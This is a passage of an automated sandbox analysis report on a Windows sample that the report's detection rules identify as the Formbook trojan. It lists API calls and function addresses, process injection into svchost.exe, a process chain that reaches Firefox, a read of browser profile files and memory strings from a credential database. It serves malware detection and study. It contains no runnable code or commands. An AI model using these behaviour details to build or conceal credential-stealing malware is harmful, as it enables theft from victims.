Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C72BA0 NtEnumerateValueKey,	2_2_03C72BA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C72AD0 NtReadFile,	2_2_03C72AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C72AF0 NtWriteFile,	2_2_03C72AF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C72AB0 NtWaitForSingleObject,	2_2_03C72AB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C72FE0 NtCreateFile,	2_2_03C72FE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C72F90 NtProtectVirtualMemory,	2_2_03C72F90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C72FA0 NtQuerySection,	2_2_03C72FA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C72FB0 NtResumeThread,	2_2_03C72FB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C72F60 NtCreateProcessEx,	2_2_03C72F60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C72F30 NtCreateSection,	2_2_03C72F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C72EE0 NtQueueApcThread,	2_2_03C72EE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C72E80 NtReadVirtualMemory,	2_2_03C72E80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C72EA0 NtAdjustPrivilegesToken,	2_2_03C72EA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C72E30 NtWriteVirtualMemory,	2_2_03C72E30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C72DD0 NtDelayExecution,	2_2_03C72DD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C72DB0 NtEnumerateKey,	2_2_03C72DB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C72D00 NtSetInformationFile,	2_2_03C72D00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C72D10 NtMapViewOfSection,	2_2_03C72D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C72D30 NtUnmapViewOfSection,	2_2_03C72D30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C72CC0 NtQueryVirtualMemory,	2_2_03C72CC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C72CF0 NtOpenProcess,	2_2_03C72CF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C72CA0 NtQueryInformationToken,	2_2_03C72CA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C72C60 NtCreateKey,	2_2_03C72C60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C72C70 NtFreeVirtualMemory,	2_2_03C72C70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C72C00 NtQueryInformationProcess,	2_2_03C72C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C73090 NtSetValueKey,	2_2_03C73090
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C73010 NtOpenDirectoryObject,	2_2_03C73010
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C739B0 NtGetContextThread,	2_2_03C739B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C73D70 NtOpenThread,	2_2_03C73D70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C73D10 NtOpenProcessToken,	2_2_03C73D10

Source: C:\Users\user\Desktop\psibx9rXra.exe

Code function: 0_2_00FEA1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,

0_2_00FEA1EF

Source: C:\Users\user\Desktop\psibx9rXra.exe

Code function: 0_2_00FD8310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

0_2_00FD8310

Source: C:\Users\user\Desktop\psibx9rXra.exe

Code function: 0_2_00FE51BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,

0_2_00FE51BD

Source: C:\Users\user\Desktop\psibx9rXra.exe	Code function: 0_2_00F8E6A0	0_2_00F8E6A0
Source: C:\Users\user\Desktop\psibx9rXra.exe	Code function: 0_2_00FAD975	0_2_00FAD975
Source: C:\Users\user\Desktop\psibx9rXra.exe	Code function: 0_2_00FA21C5	0_2_00FA21C5
Source: C:\Users\user\Desktop\psibx9rXra.exe	Code function: 0_2_00FB62D2	0_2_00FB62D2
Source: C:\Users\user\Desktop\psibx9rXra.exe	Code function: 0_2_010003DA	0_2_010003DA
Source: C:\Users\user\Desktop\psibx9rXra.exe	Code function: 0_2_00FB242E	0_2_00FB242E
Source: C:\Users\user\Desktop\psibx9rXra.exe	Code function: 0_2_00FA25FA	0_2_00FA25FA
Source: C:\Users\user\Desktop\psibx9rXra.exe	Code function: 0_2_00F966E1	0_2_00F966E1
Source: C:\Users\user\Desktop\psibx9rXra.exe	Code function: 0_2_00FDE616	0_2_00FDE616
Source: C:\Users\user\Desktop\psibx9rXra.exe	Code function: 0_2_00FB878F	0_2_00FB878F
Source: C:\Users\user\Desktop\psibx9rXra.exe	Code function: 0_2_00FE8889	0_2_00FE8889
Source: C:\Users\user\Desktop\psibx9rXra.exe	Code function: 0_2_00FB6844	0_2_00FB6844
Source: C:\Users\user\Desktop\psibx9rXra.exe	Code function: 0_2_00F98808	0_2_00F98808
Source: C:\Users\user\Desktop\psibx9rXra.exe	Code function: 0_2_01000857	0_2_01000857
Source: C:\Users\user\Desktop\psibx9rXra.exe	Code function: 0_2_00FACB21	0_2_00FACB21
Source: C:\Users\user\Desktop\psibx9rXra.exe	Code function: 0_2_00FB6DB6	0_2_00FB6DB6
Source: C:\Users\user\Desktop\psibx9rXra.exe	Code function: 0_2_00F96F9E	0_2_00F96F9E
Source: C:\Users\user\Desktop\psibx9rXra.exe	Code function: 0_2_00F93030	0_2_00F93030
Source: C:\Users\user\Desktop\psibx9rXra.exe	Code function: 0_2_00FAF1D9	0_2_00FAF1D9
Source: C:\Users\user\Desktop\psibx9rXra.exe	Code function: 0_2_00FA3187	0_2_00FA3187
Source: C:\Users\user\Desktop\psibx9rXra.exe	Code function: 0_2_00F81287	0_2_00F81287
Source: C:\Users\user\Desktop\psibx9rXra.exe	Code function: 0_2_00FA1484	0_2_00FA1484
Source: C:\Users\user\Desktop\psibx9rXra.exe	Code function: 0_2_00F95520	0_2_00F95520
Source: C:\Users\user\Desktop\psibx9rXra.exe	Code function: 0_2_00FA7696	0_2_00FA7696
Source: C:\Users\user\Desktop\psibx9rXra.exe	Code function: 0_2_00F95760	0_2_00F95760
Source: C:\Users\user\Desktop\psibx9rXra.exe	Code function: 0_2_00FA1978	0_2_00FA1978
Source: C:\Users\user\Desktop\psibx9rXra.exe	Code function: 0_2_00FB9AB5	0_2_00FB9AB5
Source: C:\Users\user\Desktop\psibx9rXra.exe	Code function: 0_2_00F8FCE0	0_2_00F8FCE0
Source: C:\Users\user\Desktop\psibx9rXra.exe	Code function: 0_2_01007DDB	0_2_01007DDB
Source: C:\Users\user\Desktop\psibx9rXra.exe	Code function: 0_2_00FABDA6	0_2_00FABDA6
Source: C:\Users\user\Desktop\psibx9rXra.exe	Code function: 0_2_00FA1D90	0_2_00FA1D90
Source: C:\Users\user\Desktop\psibx9rXra.exe	Code function: 0_2_00F93FE0	0_2_00F93FE0
Source: C:\Users\user\Desktop\psibx9rXra.exe	Code function: 0_2_00F8DF00	0_2_00F8DF00
Source: C:\Users\user\Desktop\psibx9rXra.exe	Code function: 0_2_019968C8	0_2_019968C8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00418693	2_2_00418693
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00416873	2_2_00416873
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00402890	2_2_00402890
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00410143	2_2_00410143
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040E1C3	2_2_0040E1C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004031F0	2_2_004031F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00401220	2_2_00401220
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00402CEA	2_2_00402CEA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00402CF0	2_2_00402CF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_004024F0	2_2_004024F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_00401D10	2_2_00401D10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0042ED83	2_2_0042ED83
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0040FF23	2_2_0040FF23
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C4E3F0	2_2_03C4E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03D003E6	2_2_03D003E6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CFA352	2_2_03CFA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CC02C0	2_2_03CC02C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CE0274	2_2_03CE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CF81CC	2_2_03CF81CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03D001AA	2_2_03D001AA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CC8158	2_2_03CC8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C30100	2_2_03C30100
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CDA118	2_2_03CDA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CD2000	2_2_03CD2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C3C7C0	2_2_03C3C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C64750	2_2_03C64750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C40770	2_2_03C40770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C5C6E0	2_2_03C5C6E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03D00591	2_2_03D00591
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C40535	2_2_03C40535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CEE4F6	2_2_03CEE4F6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CF2446	2_2_03CF2446
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CE4420	2_2_03CE4420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CF6BD7	2_2_03CF6BD7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CFAB40	2_2_03CFAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C3EA80	2_2_03C3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C429A0	2_2_03C429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03D0A9A6	2_2_03D0A9A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C56962	2_2_03C56962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C6E8F0	2_2_03C6E8F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C268B8	2_2_03C268B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C4A840	2_2_03C4A840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C42840	2_2_03C42840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C32FC8	2_2_03C32FC8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C4CFE0	2_2_03C4CFE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CBEFA0	2_2_03CBEFA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CB4F40	2_2_03CB4F40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C82F28	2_2_03C82F28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C60F30	2_2_03C60F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CE2F30	2_2_03CE2F30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CFEEDB	2_2_03CFEEDB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C52E90	2_2_03C52E90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CFCE93	2_2_03CFCE93
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C40E59	2_2_03C40E59
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CFEE26	2_2_03CFEE26
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C3ADE0	2_2_03C3ADE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C58DBF	2_2_03C58DBF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C4AD00	2_2_03C4AD00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CDCD1F	2_2_03CDCD1F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C30CF2	2_2_03C30CF2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CE0CB5	2_2_03CE0CB5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C40C00	2_2_03C40C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C8739A	2_2_03C8739A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C2D34C	2_2_03C2D34C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CF132D	2_2_03CF132D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C5B2C0	2_2_03C5B2C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CE12ED	2_2_03CE12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C452A0	2_2_03C452A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C4B1B0	2_2_03C4B1B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C7516C	2_2_03C7516C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C2F172	2_2_03C2F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03D0B16B	2_2_03D0B16B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CEF0CC	2_2_03CEF0CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C470C0	2_2_03C470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CF70E9	2_2_03CF70E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CFF0E0	2_2_03CFF0E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CFF7B0	2_2_03CFF7B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CF16CC	2_2_03CF16CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CDD5B0	2_2_03CDD5B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CF7571	2_2_03CF7571
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C31460	2_2_03C31460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CFF43F	2_2_03CFF43F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CB5BF0	2_2_03CB5BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C7DBF9	2_2_03C7DBF9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C5FB80	2_2_03C5FB80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CFFB76	2_2_03CFFB76
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CEDAC6	2_2_03CEDAC6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CDDAAC	2_2_03CDDAAC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C85AA0	2_2_03C85AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CE1AA3	2_2_03CE1AA3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CFFA49	2_2_03CFFA49
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CF7A46	2_2_03CF7A46
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CB3A6C	2_2_03CB3A6C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C49950	2_2_03C49950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C5B950	2_2_03C5B950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CD5910	2_2_03CD5910
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C438E0	2_2_03C438E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CAD800	2_2_03CAD800
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C41F92	2_2_03C41F92
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CFFFB1	2_2_03CFFFB1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CFFF09	2_2_03CFFF09
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C49EB0	2_2_03C49EB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C5FDC0	2_2_03C5FDC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C43D40	2_2_03C43D40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CF1D5A	2_2_03CF1D5A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CF7D73	2_2_03CF7D73
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CFFCF2	2_2_03CFFCF2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03CB9C32	2_2_03CB9C32

Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03C75130 appears 58 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03C2B970 appears 280 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03C87E54 appears 102 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03CAEA12 appears 86 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03CBF290 appears 105 times
Source: C:\Users\user\Desktop\psibx9rXra.exe	Code function: String function: 00FA0AE3 appears 70 times
Source: C:\Users\user\Desktop\psibx9rXra.exe	Code function: String function: 00FA8900 appears 42 times
Source: C:\Users\user\Desktop\psibx9rXra.exe	Code function: String function: 00F87DE1 appears 35 times

Source: psibx9rXra.exe, 00000000.00000003.2191876416.0000000004363000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs psibx9rXra.exe
Source: psibx9rXra.exe, 00000000.00000003.2192250796.000000000450D000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs psibx9rXra.exe

Source: psibx9rXra.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.2535902466.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.3455881831.0000000004FE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.3455791423.0000000004F90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.3446776007.00000000032D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.2536228710.0000000003AD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000007.00000002.3457739749.0000000005530000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.2536655020.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.3456190580.00000000039A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@7/3@5/4

Source: C:\Users\user\Desktop\psibx9rXra.exe

Code function: 0_2_00FEA06A GetLastError,FormatMessageW,

0_2_00FEA06A

Source: C:\Users\user\Desktop\psibx9rXra.exe	Code function: 0_2_00FD81CB AdjustTokenPrivileges,CloseHandle,		0_2_00FD81CB
Source: C:\Users\user\Desktop\psibx9rXra.exe	Code function: 0_2_00FD87E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		0_2_00FD87E1

Source: C:\Users\user\Desktop\psibx9rXra.exe

Code function: 0_2_00FEB3FB SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

0_2_00FEB3FB

Source: C:\Users\user\Desktop\psibx9rXra.exe

Code function: 0_2_00FFEE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

0_2_00FFEE0D

Source: C:\Users\user\Desktop\psibx9rXra.exe

Code function: 0_2_00FF83BB CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear,

0_2_00FF83BB

Source: C:\Users\user\Desktop\psibx9rXra.exe

Code function: 0_2_00F84E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

0_2_00F84E89

Source: C:\Users\user\Desktop\psibx9rXra.exe

File created: C:\Users\user\AppData\Local\Temp\aut81AB.tmp

Source: psibx9rXra.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Program Files\Mozilla Firefox\firefox.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Source: C:\Users\user\Desktop\psibx9rXra.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: newdev.exe, 00000005.00000003.2745985178.00000000035D4000.00000004.00000020.00020000.00000000.sdmp, newdev.exe, 00000005.00000002.3446964791.0000000003605000.00000004.00000020.00020000.00000000.sdmp, newdev.exe, 00000005.00000002.3446964791.00000000035D4000.00000004.00000020.00020000.00000000.sdmp, newdev.exe, 00000005.00000002.3446964791.00000000035B3000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: psibx9rXra.exe

ReversingLabs: Detection: 68%

Source: unknown	Process created: C:\Users\user\Desktop\psibx9rXra.exe "C:\Users\user\Desktop\psibx9rXra.exe"
Source: C:\Users\user\Desktop\psibx9rXra.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\psibx9rXra.exe"
Source: C:\Program Files (x86)\EXHZPYvIwvgEBduJGAxoCxejNzVsrMhhecmxXEagXohllIqQjzyrjmTLWkklOdYTpuBILy\GFwdSeXZEVUZM.exe	Process created: C:\Windows\SysWOW64\newdev.exe "C:\Windows\SysWOW64\newdev.exe"
Source: C:\Windows\SysWOW64\newdev.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\psibx9rXra.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\psibx9rXra.exe"	Jump to behavior
Source: C:\Program Files (x86)\EXHZPYvIwvgEBduJGAxoCxejNzVsrMhhecmxXEagXohllIqQjzyrjmTLWkklOdYTpuBILy\GFwdSeXZEVUZM.exe	Process created: C:\Windows\SysWOW64\newdev.exe "C:\Windows\SysWOW64\newdev.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\newdev.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\psibx9rXra.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\psibx9rXra.exe	Section loaded: version.dll	Jump to behavior
